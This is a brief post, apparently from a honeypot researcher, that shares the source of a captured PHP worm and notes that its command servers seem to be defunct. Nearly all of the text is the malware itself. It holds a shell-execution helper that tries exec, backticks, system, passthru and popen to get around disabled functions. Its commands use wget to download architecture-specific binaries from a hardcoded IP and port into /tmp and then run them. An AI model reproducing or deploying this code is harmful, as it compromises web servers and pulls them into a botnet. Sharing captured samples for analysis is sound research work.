PHP malware

honeypress-payload-2.md

@dustyfresh

PHP Worm

This worm seems to be defunct now.. the C&C servers that this code references (over HTTP) don't seem to function any longer.

<?php
@ini_get("disable_functions");
if (!empty($disablefunc))
{
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
}
function myshellexec($cmd)
{
global $disablefunc;
$result = "";
if (!empty($cmd))
{
 if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
 elseif (($result = `$cmd`) !== FALSE) {}
 elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
 elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
 elseif (is_resource($fp = popen($cmd,"r")))
 {
  $result = "";
  while(!feof($fp)) {$result .= fread($fp,1024);}
  pclose($fp);
 }
}
return $result;
}
myshellexec("rm -rf /tmp/armeabi;wget -P /tmp http://62.145.166.198:58455/armeabi;chmod  x /tmp/armeabi");
myshellexec("rm -rf /tmp/arm;wget -P /tmp http://62.145.166.198:58455/arm;chmod  x /tmp/arm");
myshellexec("rm -rf /tmp/ppc;wget -P /tmp http://62.145.166.198:58455/ppc;chmod  x /tmp/ppc");
myshellexec("rm -rf /tmp/mips;wget -P /tmp http://62.145.166.198:58455/mips;chmod  x /tmp/mips");
myshellexec("rm -rf /tmp/mipsel;wget -P /tmp http://62.145.166.198:58455/mipsel;chmod  x /tmp/mipsel");
myshellexec("rm -rf /tmp/x86;wget -P /tmp http://62.145.166.198:58455/x86;chmod  x /tmp/x86");
myshellexec("rm -rf /tmp/nodes;wget -P /tmp http://62.145.166.198:58455/nodes;chmod  x /tmp/nodes");
myshellexec("rm -rf /tmp/sig;wget -P /tmp http://62.145.166.198:58455/sig;chmod  x /tmp/sig");
myshellexec("/tmp/armeabi;/tmp/arm;/tmp/ppc;/tmp/mips;/tmp/mipsel;/tmp/x86;");
?>